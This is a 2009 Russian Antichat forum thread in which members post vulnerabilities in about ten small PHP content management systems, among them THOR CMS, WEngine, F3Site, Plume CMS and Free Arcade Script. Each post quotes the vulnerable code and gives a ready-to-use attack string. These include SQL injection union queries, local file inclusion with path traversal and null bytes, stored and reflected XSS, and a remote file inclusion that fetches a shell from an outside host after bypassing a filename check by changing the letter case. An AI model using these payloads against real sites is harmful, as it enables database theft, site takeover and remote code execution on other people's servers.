Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
20.11.2009, 04:08
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
THOR CMS VERSION 1.3.1
THOR CMS VERSION 1.3.1
CMS - каким то кривым образом сделана на основе phpbb, а может и является ему дополнением (руки б оторвать тому кто его писал).
Local File Include in news.php:
register_globals = ON
PHP код:
...
include($phpbb_root_path . 'common.'.$phpEx);
...
PoC:
Код:
http://localhost/24/news.php?phpEx=./../FILE
SQL injection in content.php:
PHP код:
...
$dyn_id = $HTTP_GET_VARS['dyn_id'];
$sql = "SELECT * FROM " . CMS_DYN . " WHERE id = ".$dyn_id."";
...
PoC:
Код:
http://localhost/24/content.php?dyn_id=[SQL]
CMS VERSION:
Код:
http://localhost/24/readme.txt
Обычно этот файл НЕ удаляют!
Последний раз редактировалось Ins3t; 20.11.2009 в 23:21..
|
|
|
21.11.2009, 02:06
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: WEngine
Version: 1.0
Author: http://hot.ee
SQL-inj
file: /modules/news/index.php
PHP код:
$read = $_GET['read'];
$newssql = "select * from news where news_id = '$read'";
$newsresult = mysql_query($newssql);
$newsrow = mysql_fetch_array($newsresult);
target: ?read=1'+union+select+1,2,3,version()/*
file: user.php
PHP код:
$login = $_POST['login'];
$password = $_POST['password'];
$email = $_POST['email'];
$entersql = "SELECT * FROM users WHERE user_name = '$login'";
$enterresult = mysql_query($entersql);
...
$entersql = "SELECT user_password FROM users WHERE user_name = '$login'";
Передача идет методом POST.
target: ?login=user'+union+select+1,2,3,4,5/*
file: mail.php
PHP код:
$send = $_GET['sendid'];
$mail = $_GET['mail'];
if($mail == ""):
print("Вы не ввели email!");
exit;
endif;
$newssql = "select * from news where news_id = '$send'";
target: ?send=1'+union+select+1,version(),database(),4/*
Sql-inj не совсем обычная,вывод будет у вас на E-mail,так что его нужно вводить рабочий.
file: print.php
PHP код:
$print = $_GET['print'];
$newssql = "select * from news where news_id = '$print'";
$newsresult = mysql_query($newssql);
$newsrow = mysql_fetch_array($newsresult);
printf("<b>%s</b><hr>", $newsrow['news_name']);
target: ?print=1'+union+select+1,version(),3,4/*
Так-же уязвимы еще некоторые файлы,но выкладывать это не вижу смысла,так как все скули однотипные.Для некоторых уязвимостей,необходимо MQ = off дабы кавычки пролетали свободно.
Последний раз редактировалось m0Hze; 21.11.2009 в 09:29..
|
|
|
|
21.11.2009, 03:01
|
|
Новичок
Регистрация: 15.11.2009
Сообщений: 8
Провел на форуме:
31294
Репутация:
79
|
|
PyLucid CMS
Passive XSS
/_command/19/RSSfeedGenerator/download/RSS.xml?count=>>''<script>alert(xss)</script
здесь же и раскрыте путей
/_command/19/RSSfeedGenerator/download/RSS.xml?count=
(с) Twin $park
Последний раз редактировалось Twin $park; 01.01.2010 в 22:45..
|
|
|
|
21.11.2009, 12:51
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Mini-CWB CMS
Author: GraFX Software Solutions (GPL)
Version: 2.1.1
LFI
file: all (!)
PHP код:
if (!isset($_SESSION['session_lang']))
{
$session_lang = $LANG;
$_SESSION['session_lang']=$session_lang;
}
else
$session_lang=$_SESSION['session_lang'];
include_once(INDEX_PATH."cls_fast_template.php");
$NEWLANG = $session_lang;
include_once(INCLUDE_LANGUAGE_PATH.$NEWLANG.".inc.php"); // а вот и инклуд.
target: Создаем запрос,где подменяем параметр сесии с названием session_lang на запрос инклуда файла.Пример: session_lang=file.php%00
MQ=off, ../ не фильтруеться.
Последний раз редактировалось m0Hze; 21.11.2009 в 14:01..
|
|
|
|
21.11.2009, 13:36
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: F3Site
Author: unnamed
Version: 2009
LFI
file: index.php
PHP код:
if(file_exists('./mod/'.$_GET['co'].'.php'))
{
(include './mod/'.$_GET['co'].'.php') OR $content->set404();
}
elseif(file_exists('./plugins/'.$_GET['co'].'/default.php'))
{
(include './plugins/'.$_GET['co'].'/default.php') OR $content->set404();
}
target: index.php?co=../../hello.php%00
mq=off
Thx, jokester!
извиняюсь,это только на моем сервере нужна кавычка.
Последний раз редактировалось m0Hze; 21.11.2009 в 14:01..
|
|
|
|
21.11.2009, 13:57
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
FACIL CMS
Local File Include in modules.php:
PHP код:
...
$_MODLOAD = trim($_GET['modload']);
...
if(file_exists(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/index.php'))
{
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/i18n/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php');
...
PoC:
Код:
http://localhost/facil/modules.php?modload=existing_dir/../../../FILE//////////[...]
phpinfo file:
Код:
http://localhost/facil/phpinfo.php
Последний раз редактировалось Ins3t; 21.11.2009 в 14:13..
|
|
|
|
21.11.2009, 14:14
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Blogs Files
Sql-injection
/member/edit.php
PHP код:
$memberid = $_POST['id'];
// Н-ко строк спустя).
$query2 = "SELECT * FROM accounts WHERE id = '$memberid'";
$result2 = mysql_query($query2) or die("Error on QUERY 2: ".mysql_error());
Sql-injection
/create_account.php
PHP код:
if ($_POST['username']=="")
{
echo "<p>
<label for='username'>Desired Username: </label>
<input type='text' name='username' style='background-color: red;' size='30' maxlength='15'/>
</p>";
}
//Н-ко строк спустя).
$result = mysql_query("SELECT * FROM accounts
WHERE Username='$_POST[username]'");
|
|
|
|
21.11.2009, 14:24
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Plume CMS
Author: unnamed
Version: 1.2.3
RFI
file: prepend.php
PHP код:
if (basename($_SERVER['SCRIPT_NAME']) == 'prepend.php') exit;
include_once $_PX_config['manager_path'].'/conf/config.php';
include_once $_PX_config['manager_path'].'/inc/class.config.php';
include_once $_PX_config['manager_path'].'/inc/lib.text.php';
include_once $_PX_config['manager_path'].'/inc/class.hook.php';
include_once $_PX_config['manager_path'].'/inc/class.dispatcher.php';
include_once $_PX_config['manager_path'].'/inc/class.rss.php';
include_once $_PX_config['manager_path'].'/inc/class.search.php';
include_once $_PX_config['manager_path'].'/inc/class.error404.php';
include_once $_PX_config['manager_path'].'/inc/class.category.php';
include_once $_PX_config['manager_path'].'/inc/class.resource.php';
include_once $_PX_config['manager_path'].'/inc/class.news.php';
include_once $_PX_config['manager_path'].'/inc/class.article.php';
include_once $_PX_config['manager_path'].'/inc/class.resourceset.php';
include_once $_PX_config['manager_path'].'/inc/lib.frontend.php';
include_once $_PX_config['manager_path'].'/inc/lib.sql.php';
include_once $_PX_config['manager_path'].'/inc/class.paginator.php';
include_once $_PX_config['manager_path'].'/inc/class.cache.php';
include_once $_PX_config['manager_path'].'/inc/class.sitemap.php';
include_once $_PX_config['manager_path'].'/inc/class.l10n.php';
Как видим,есть защита:
PHP код:
if (basename($_SERVER['SCRIPT_NAME']) == 'prepend.php') exit;
Если обратиться к этому скрипту напрямую,он просто прекратит работу.
Но авторы не учли маленькую вещь,регистр.Легкий и изящный обход:
target: prepend.PhP?_PX_config[manager_path]=http://site.ru/shell.txt%00
Просто меняем регистр у расширения,и проверка уже не срабатывает.Следует отметить,что наш файл заинклудиться стопицот раз,так что в своем шеле пишем,в самом конце, Exit(); Таким образом,предотвратиться инклуд остальных шелов.
Важно! Необходимо registers_global = on
Iceangel_: Не все требования указал к этой баге, подумай...
Последний раз редактировалось Iceangel_; 22.11.2009 в 12:38..
|
|
|
|
21.11.2009, 18:42
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
CMS AVA LIFE
Активная XSS:
Отправляем на сервер HTTP запрос. Добавляем к одному из Header'ов (В середине где нибудь)
<script>alert();</script>
А администратора сайта в Статистике сработает скрипт.
|
|
|
|
21.11.2009, 18:56
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Free Arcade Script v2.0rc1
Local File Include in index.php:
register_globals = ON
PHP код:
...
include ('includes/core.php');
...
default:
include ('templates/'.$template.'/base_home.php');
include ('includes/defaultsubmenu.php');
include ('includes/defaultsubmenu2.php');
break;
...
In core.php:
PHP код:
...
if($_GET['template']){
exit('N00B.');
}
...
$template = $set['template'];
...
Теперь говоря по русски: это у них типа защита такая, то есть они пушут, что если передано $_GET['template'], то выводится сообщение "Нуб" 
Но после этого они написали:
PHP код:
$template = $set['template'];
И открыли нам путь к инклуду:
Код:
http://localhost/11/index.php?set[template]=../../FILE%00
Но по сути
PHP код:
if($_GET['template']){
exit('N00B.');
}
Так же очень просто обходится, достаточно передать template через POST или COOKIE 
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
